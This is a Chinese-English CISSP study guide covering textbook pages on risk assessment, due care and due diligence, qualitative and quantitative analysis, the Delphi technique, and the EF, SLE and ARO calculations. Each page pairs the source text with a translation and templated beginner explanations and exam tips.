顾问骑兵 风险评估是一个高度复杂、详细、繁琐且耗时的过程。 由于风险的规模、 范围或责任重大,现有员工往往无法妥善处理风险分析; 因此,许多组织 会聘请风险管理顾问来执行此项工作。 这能够提供高水平的专业能力,避 免影响员工的日常工作,并能更可靠地衡量实际风险。 然而,即使风险管 理顾问也不会仅凭纸面进行风险评估与分析; 他们通常会使用风险评估软 件。 此类软件可简化整体任务,提供更可靠的结果,并生成保险公司、董 事会等认可的标准报告。 风险评估/分析 风险管理主要是高级管理层的责任。 然而,高级管理层通常会将风险分析和风 险应对建模任务分配给来自IT和安全部门的团队。 风险评估团队的结果将作为 提案提交给高级管理层。 高级管理层将最终决定组织实施哪些应对措施。 高级管理层有责任启动并支持风险分析与评估,通过界定该工作的范围和目 的。 所有风险评估、结果、决策、行动和成果都必须由高级管理层理解并批 准,作为提供审慎注意/尽职调查的要素。 “谨慎行为”和“合理行为”是法律和道德语境中使用的术语,用于描述不同 的行为或决策标准,尤其与风险管理相关。 尽管这些标准有一些相似之处,但 它们具有不同的含义。

谨慎行为是指以高度谨慎、细心和远见为特征的行为或 决策。 它们以对潜在风险的仔细考量、防止伤害的专注以及坚持按照既定最佳 实践或行业标准行事为特点。 谨慎行为通常涉及采取超出“合理”范围的额外 预防措施,以确保最高水平的安全和保护。 谨慎

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

标准:标准给出必须满足的最低要求。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

Minimum level、mandatory requirement 常对应 standard。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
标准 标准给出必须满足的最低要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 23 / PDF P162

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

implies a proactive and diligent approach to decision-making. In a legal context, acting prudently may serve to protect an individual or organization from liability in cases where a higher standard of care is expected. Reasonable actions refer to actions or decisions that are in line with what a person of ordinary prudence and judgment would do in similar circumstances. These actions are based on the idea of acting in a manner that is sensible, rational, and consistent with societal norms and expectations. Reasonable actions are a standard often used in legal and ethical contexts to assess whether an individual's behavior or decisions meet a minimum threshold of acceptability.

In a legal context, “acting reasonably” often serves as a benchmark to determine whether someone has met their duty of care, particularly in cases where negligence or liability is in question. Therefore, prudent actions are characterized by an above-average level of caution and diligence, whereas reasonable actions are aligned with common expectations and societal norms. The choice between these standards may depend on the specific circumstances, legal requirements, and ethical considerations, as well as the degree of care and caution expected in a given situation. All IT systems have risk. All organizations have risk. Every task performed by a worker has risk.

There is no way to eliminate 100 percent of all risks. Instead, upper management must decide which risks are acceptable and which are not. Determining which risks are acceptable requires detailed and complex asset and risk assessments, as well as a thorough understanding of the organization's budget, internal expertise and experience, business conditions, and many other internal and external factors. What is deemed acceptable to one organization may not be viewed the same way by another. For example, you might think that losing $100 is a significant loss and impact to your monthly personal budget, but the wealthy might not even realize if they lost or wasted hundreds or thousands of dollars.

Risk is personal, or at least specific to an organization based on its assets, its threats, its threat agents/actors, and its risk tolerance. Scope refers to the extent or boundaries of a risk management process, project, or assessment. It defines what is included and what is excluded in the risk management efforts. Determining the scope is a critical step in effectively managing and addressing risks, as it helps organizations focus their resources and efforts on the most relevant areas. Establishing a welldefined scope is essential for effective risk management because it helps

中文直译 / 整理

意味着一种主动且勤勉的决策方式。 在法律背景下,谨慎行事可能有助于在 预期更高注意义务的情况下,保护个人或组织免于承担责任。 合理行为是指符合普通谨慎和判断力人士在类似情况下所采取的行为或决策。 这些行为基于以明智、理性且符合社会规范和期望的方式行事的理念。 合理行 为常用于法律和伦理语境中,用以评估个人的行为或决策是否达到可接受的最 低标准。 在法律语境中,"合理行事"通常作为衡量某人是否履行了注意义务的 基准,尤其是在涉及过失或责任的案件中。 因此,审慎行为以高于平均水平的谨慎和勤勉为特征,而合理行为则与普遍 期望和社会规范保持一致。 在具体情境、法律要求、伦理考量以及特定情况 下所期望的注意与谨慎程度的影响下,选择适用哪种标准可能有所不同。 所有信息系统都存在风险,所有组织都面临风险,每位员工执行的每一项任务 都带有风险。 不可能完全消除100%的所有风险。 相反,高层管理者必须决定哪 些风险是可接受的,哪些是不可接受的。 确定哪些风险可接受,需要进行详细 而复杂的资产与风险评估,并充分了解组织的预算、内部专业知识与经验、商 业状况以及其他众多内外部因素。 一个组织认为可接受的风险,另一个组织可 能并不如此看待。

例如,你可能认为损失100美元对你的月度个人预算而言是重 大损失和影响,但富人可能根本察觉不到自己损失或浪费了数百甚至数千美元。 风险具有个人性,或至少取决于组织的资产、威胁、威胁主体/行为者及其风险 承受能力。 范围指的是风险管理过程、项目或评估的范围或边界。 它定义了风险管理工作 中包含和不包含的内容。 确定范围是有效管理和应对风险的关键步骤,因为它 有助于组织将资源和精力集中在最相关的领域。 建立清晰的范围对于有效的风 险管理至关重要,因为它有助于

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 24 / PDF P163

第 163 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

organizations prioritize their efforts, allocate resources efficiently, and ensure that risks are adequately assessed and mitigated in the areas that matter most. A clear and well-communicated scope also reduces ambiguity and ensures that all relevant parties are on the same page regarding the objectives and boundaries of the risk management process. Once an inventory of threats and assets (or assets and threats) is developed based on a defined scope, each asset-threat pairing must be individually evaluated and its related risk calculated or assessed. There are two primary risk assessment methodologies: quantitative and qualitative.

Quantitative risk analysis assigns real dollar figures to the loss of an asset and is based on mathematical calculations. Qualitative risk analysis assigns subjective and intangible values to the loss of an asset and takes into account perspectives, feelings, intuition, preferences, ideas, and gut reactions. Both methods are necessary for a complete perspective on organizational risk. Most environments employ a hybrid of both risk assessment methodologies in order to gain a balanced view of their security concerns. The goal of risk assessment is to identify risks (based on asset-threat pairings) and rank them in order of criticality.

This risk criticality prioritization is needed in order to guide the organization in optimizing the use of their limited resources on protections against identified risks, from the most significant to those just above the risk acceptance threshold. The two risk assessment approaches (quantitative and qualitative) can be seen as distinct and separate concepts or endpoints on a sliding scale. As discussed in Chapter 1, a basic probability versus potential damage 3×3 matrix relies on an innate understanding of the assets and threats and relies on a judgment call of the risk analyst to decide whether the likelihood and severity are low, medium, or high.

This is likely the simplest form of qualitative assessment. It requires minimum time and effort. However, if it fails to provide the needed clarity or distinction of criticality prioritization, then a more in-depth approach should be undertaken. A 5×5 matrix or even larger could be used. However, each increase in matrix size requires more knowledge, more research, and more time to assign a level to probability and severity properly. At some point, the evaluation shifts from being mostly subjective qualitative to more substantial quantitative.

Another perspective on the two risk assessment approaches is that a qualitative mechanism can be used first to determine whether a detailed and resource/time-expensive quantitative mechanism is necessary. An

中文直译 / 整理

组织优先处理工作、高效分配资源,并确保在最重要的领域对风险进行充分评 估和缓解。 清晰且明确传达的范围还能减少模糊性,确保所有相关方对风险管 理过程的目标和边界达成一致。 一旦根据定义的范围制定了威胁和资产(或资产和威胁)清单,就必须对每个 资产‑威胁配对进行单独评估,并计算或评估其相关风险。 主要有两种风险评估 方法:定量和定性。 定量风险分析为资产损失分配实际的美元金额,并基于数 学计算。 定性风险分析为资产损失分配主观且无形的值,并考虑观点、感受、 直觉、偏好、想法和本能反应。 这两种方法对于全面了解组织风险都是必要的。 大多数环境采用这两种风险评估方法的混合形式,以获得对安全关切的平衡视 角。 风险评估的目标是识别风险(基于资产‑威胁配对)并按重要性进行排序。 这种 风险重要性优先级排序对于指导组织优化其有限资源在应对已识别风险上的使 用至关重要,从最重大的风险开始,直至略高于风险可接受阈值的风险。 两种风险评估方法(定量和定性)可以被视为独立且分离的概念,或位于一个 连续尺度上的两端。

如第1章所述,基本的概率与潜在损害3×3矩阵依赖于对 资产和威胁的固有理解,并依赖于风险分析人员的判断,以决定可能性和严重 性是低、中还是高。 这可能是最简单的定性评估形式,所需时间和精力最少。 然而,如果它无法提供所需的清晰度或关键性优先级区分,则应采用更深入的 方法。 可以使用5×5 更大的矩阵,甚至更大。 但每次矩阵规模的扩大都需要更 多的知识、更多的研究和更多的时间来正确分配概率和严重性的等级。 在某个 节点上,评估将从主要主观的定性转向更实质性的定量。 对这两种风险评估方法的另一种看法是,可以先使用定性方法来确定是否有必 要采用详细且耗费资源/时间的定量方法。 一个

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 163 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 25 / PDF P164

第 164 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

organization can also perform both approaches and use them to adjust or modify each other; for example, qualitative results can be used to fine-tune quantitative priorities. Qualitative Risk Analysis Qualitative risk analysis is more scenario-based, perception-based, or gut reaction-based than it is mathematically-based. Rather than assigning exact dollar figures to possible losses, you rank threats on a relative scale to evaluate their risks, costs, and effects. Since a purely quantitative risk assessment is not possible, balancing the results of a quantitative analysis is essential.

The method of combining quantitative and qualitative analysis into a final assessment of organizational risk is known as hybrid assessment or hybrid analysis. The process of performing qualitative risk analysis involves judgment, intuition, and experience. You can use many techniques to perform qualitative risk analysis: Brainstorming Storyboarding Focus groups Surveys Questionnaires Checklists One-on-one meetings Interviews Scenarios Delphi technique Determining which mechanism to employ is based on the culture of the organization and the types of risks and assets involved.

It is common for several methods to be employed simultaneously and their results compared and contrasted in the final risk analysis report to upper management. Two of these that you need to be more aware of are scenarios and the Delphi technique. Scenarios

中文直译 / 整理

组织也可以同时采用这两种方法,并利用它们相互调整或修正; 例如,定性 结果可用于微调定量优先级。 定性风险分析 定性风险分析更基于场景、感知或直觉反应,而非数学基础。 您不会为可 能的损失分配确切的美元金额,而是通过相对尺度对威胁进行排序,以评估其 风险、成本和影响。 由于无法进行纯粹的定量风险评估,因此平衡定量分析的 结果至关重要。 将定量分析与定性分析结合以得出组织风险最终评估的方法称 为混合评估或混合分析。 执行定性风险分析的过程涉及判断、直觉和经验。 您 可以使用许多技术来进行定性风险分析: 头脑风暴 故事板 焦点小组 调查 问卷 检查清单 一对一会议 访谈 场景 德尔菲法 选择采用哪种机制取决于组织的文化以及涉及的风险和资产类型。 通常会同时 采用多种方法,并在最终的风险分析报告中将结果与高层管理层进行比较和对 比。 您需要更加关注的两种方法是情景分析法和德尔菲法。 场景

小白解释

场景先行:你是公司的安全负责人,正在读第 164 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 164 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 26 / PDF P165

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The basic process for all these mechanisms involves the creation of scenarios. A scenario is a written description of a single major threat. The description focuses on how a threat would be instigated and what effects its occurrence could have on the organization, the IT infrastructure, and specific assets. Generally, the scenarios are limited to one page of text to keep them manageable. For each scenario, several safeguards are described that would completely or partially protect against the major threat discussed in the scenario. The analysis participants then assign to the scenario a threat level, a loss potential, and the advantages of each safeguard.

These assignments can be simple—such as High, Medium, and Low, or a basic number scale of 1 to 10 —or they can be detailed essay responses. The responses from all participants are then compiled into a single report that is presented to upper management. For examples of reference ratings and levels, please see Tables D-3, D-4, D-5, D-6, and E-4 in NIST SP 800-30 Rev.1: csrc.nist.gov/pubs/sp/800/30/r1/final. The usefulness and validity of a qualitative risk analysis improves as the number and diversity of the participants in the evaluation increases. Whenever possible, include one or more people from each level of the organizational hierarchy, from upper management to end users.

It is also important to include a cross-section from each major department, division, office, or branch. Delphi Technique The Delphi technique is probably the primary mechanism on the previous list that is not immediately recognizable and understood. The Delphi technique is simply an anonymous feedback-and-response process used to enable a group to reach an anonymous consensus. Its primary purpose is to elicit honest and uninfluenced responses from all participants, while minimizing the influence of bias and discrimination. The participants are usually gathered in a single meeting room.

To each request for feedback, each participant writes down their response on paper or through digital messaging services anonymously. The results are compiled and presented to the group for evaluation. The process is repeated until a consensus is reached. The goal or purpose of the Delphi technique is to facilitate the evaluation of ideas, concepts, and solutions on their own merit without the discrimination that often occurs based on who the idea comes from. Quantitative Risk Analysis

中文直译 / 整理

所有这些机制的基本过程都涉及情景的创建。 情景是对单一重大威胁的书面描 述,重点阐述威胁如何被引发,以及其发生可能对组织、IT基础设施和特定资 产造成的影响。 通常,每个情景的描述限制在一页文本以内,以保持其可管理 性。 针对每个情景,会描述若干项防护措施,这些措施能够完全或部分防范情 景中讨论的重大威胁。 分析参与者随后为该情景分配威胁等级、潜在损失值以 及各项防护措施的优势。 这些分配可以是简单的——例如“高”、“中”、“低”, 或使用1到10的简单数值尺度——也可以是详细的论述性回答。 所有参与者的回 答将被汇总成一份单一报告,提交给高层管理层。 有关参考评级和等级的示例, 请参见NIST SP 800‑30 Rev.1中的表D‑3、D‑4、D‑5、D‑6和E‑4: csrc.nist.gov/pubs/sp/800/30/r1/final. 定性风险分析的有用性和有效性随着评估参与者数量和多样性的增加而提高。 尽可能包括组织层级中每个层级的一名或多名人员,从高层管理到最终用户。 同时,重要的是要从每个主要部门、分支机构、办公室或分部中选取一个代 表性样本。

德尔菲技术 德尔菲法可能是上文列表中唯一不易被立即识别和理解的主要机制。 德尔菲法 仅仅是一种匿名反馈与回应流程,用于帮助群体达成匿名共识。 其主要目的是 在最小化偏见和歧视影响的同时,激发所有参与者的诚实且不受干扰的回应。 参与者通常聚集在一个会议室中。 对于每一次反馈请求,每位参与者都会在纸 上或通过数字消息服务匿名写下他们的回应。 结果被汇总并呈现给群体进行评 估。 该过程重复进行,直到达成共识。 德尔菲法的目标或目的是促进对想法、 概念和解决方案基于其自身价值进行评估,而非因想法来源而产生歧视。 定量风险分析

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 27 / PDF P166

第 166 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The quantitative method results in concrete probability indications or a numeric indication of relative risk potential. That means the end result is a report that has dollar figures for levels of risk, potential loss, cost of countermeasures, and value of safeguards. This report is usually fairly easy to understand, especially for anyone with knowledge of spreadsheets and budget reports. Think of quantitative analysis as the act of assigning a quantity to risk—in other words, placing a dollar figure on each asset and threat impact.

However, a purely quantitative analysis is not sufficient—not all elements and aspects of the analysis can be accurately quantified because some are qualitative, subjective, or intangible. The process of quantitative risk analysis starts with asset valuation and threat identification (which can be performed in any order). This results in assetthreat pairings that need to have estimations of harm potential/severity and frequency/likelihood assigned or determined. This information is then used to calculate various cost functions that are used to evaluate safeguards.

The major steps or phases in quantitative risk analysis are as follows (see Figure 2.3, with terms and concepts defined after this list of steps): 1. Inventory assets and assign a value (asset value [AV]). 2. Research each asset and produce a list of all possible threats to each individual asset. This results in asset-threat pairings. 3. For each asset-threat pairing, calculate the exposure factor (EF). 4. Calculate the single loss expectancy (SLE) for each asset-threat pairing. 5. Perform a threat analysis to calculate the likelihood of each threat being realized within a single year—that is, the annualized rate of occurrence (ARO). 6.

Derive the overall loss potential per threat by calculating the annualized loss expectancy (ALE). 7. Research countermeasures for each threat and then calculate the changes to ARO, EF, and ALE based on an applied countermeasure. 8. Perform a cost/benefit analysis of each countermeasure for each threat for each asset. Select the most appropriate response to each threat.

中文直译 / 整理

定量方法会产生具体的概率指示或相对风险潜力的数值指示。 这意味着最终结 果是一份包含风险水平、潜在损失、应对措施成本和防护措施价值的美元金额 的报告。 这份报告通常相当容易理解,尤其是对于任何熟悉电子表格和预算报 告的人而言。 可以将定量分析视为为风险分配数量——换句话说,为每个资产 和威胁影响赋予一个美元金额。 然而,纯粹的定量分析是不够的——并非所有 分析要素和方面都能被准确量化,因为有些是定性的、主观的或无形的。 定量风险分析的过程始于资产估值和威胁识别(顺序可任意)。 这将产生需要 评估危害潜力/严重程度和频率/可能性的资产‑威胁配对。 然后,利用这些信息 计算各种成本函数,以评估防护措施。 定量风险分析的主要步骤或阶段如下(参见图2.3,步骤后定义了相关术语和概 念): 1. 清点资产并分配价值(资产价值 [AV])。 2. 研究每个资产,列出针对每个独立资产的所有可能威胁。 这将产生资产‑ 威胁配对。 3. 对每个资产‑威胁配对,计算暴露因子(EF)。 4. 计算每个资产‑威胁配对的单次损失预期值(SLE)。 5. 进行威胁分析,以计算每个威胁在单一年内发生的可能性,即年发生率 (ARO)。

6. 通过计算年度损失预期(ALE)来确定每种威胁的总体损失潜力。 7. 研究每种威胁的应对措施,然后根据所应用的应对措施计算ARO、EF 和ALE的变化。 8. 对每种威胁下的每项资产执行应对措施的成本/效益分析。 为每种威胁选择最 合适的应对方案。

小白解释

场景先行:你是公司的安全负责人,正在读第 166 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 166 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 28 / PDF P167

第 167 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 2.3 The six major elements of quantitative risk analysis The cost functions associated with quantitative risk analysis include the following: Exposure Factor The exposure factor (EF) represents the percentage of loss that an organization would experience if a specific asset were violated by a realized risk. The EF can also be called the loss potential. In most cases, a realized risk does not result in the total loss of an asset. The EF simply indicates the expected overall asset value loss because of a single realized risk. The EF is usually small for assets that are easily replaceable, such as hardware.

It can be very large for assets that are irreplaceable or proprietary, such as product designs or a database of customers. The EF is expressed as a percentage. The EF is determined by using historical internal data, performing statistical analysis, consulting

中文直译 / 整理

图 2.3定量风险分析的六个主要要素 与定量风险分析相关的成本函数包括以下内容: 暴露因子 暴露因子(EF) 表示当特定资产遭受已实现风险侵害时,组织所 遭受的损失百分比。 EF 也可称为 损失潜力。 在大多数情况下,已实现的风 险并不会导致资产的完全损失。 EF 仅表示由于单个已实现风险而导致的资 产预期总价值损失。 对于易于替换的资产(如硬件),EF 通常较小; 而对 于不可替换或专有的资产(如产品设计或客户数据库),EF 可能非常大。 EF 以百分比形式表示。 EF 通过使用历史内部数据、进行统计分析、咨询

小白解释

场景先行:你是公司的安全负责人,正在读第 167 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 167 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 29 / PDF P168

第 168 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

public or subscription risk ledgers/registers, working with consultants, or using a risk management software solution. Single-Loss Expectancy The single-loss expectancy (SLE) is the potential loss associated with a single realized threat against a specific asset. It indicates the potential amount of loss an organization would or could experience if an asset were harmed by a specific threat occurring. The SLE is calculated using the following formula: SLE = asset value (AV) * exposure factor (EF) or more simply: SLE = AV * EF The SLE is expressed in a dollar value.

For example, if an asset is valued at $200,000 and it has an EF of 45 percent for a specific threat, then the SLE of the threat for that asset is $90,000. It is not always necessary to calculate an SLE, as the ALE is the most commonly needed value in determining criticality prioritization. Thus, sometimes, during risk calculation, SLE may be skipped entirely. Annualized Rate of Occurrence The annualized rate of occurrence (ARO) is the expected frequency with which a specific threat or risk will occur (that is, become realized) within a single year.

The ARO can range from a value of 0.0 (zero), indicating that the threat or risk will never be realized, to a very large number, indicating that the threat or risk occurs often. Calculating the ARO can be complicated. It can be derived by reviewing historical internal data, performing statistical analysis, consulting public or subscription risk ledgers/registers, working with consultants, or using a risk management software solution. The ARO for some threats or risks is calculated by multiplying the likelihood of a single occurrence by the number of users who could initiate the threat. ARO is also known as a probability determination.

Here's an example: the ARO of an earthquake in Tulsa may be .00001, whereas the ARO of an earthquake in San Francisco may be .03 (for a 6.7+ magnitude), or you can compare the ARO of an earthquake in Tulsa of .00001 to the ARO of an email virus in an office in Tulsa of 10,000,000. Annualized Loss Expectancy The annualized loss expectancy (ALE) is the possible yearly loss of all instances of a specific realized threat against a specific asset. The ALE is

中文直译 / 整理

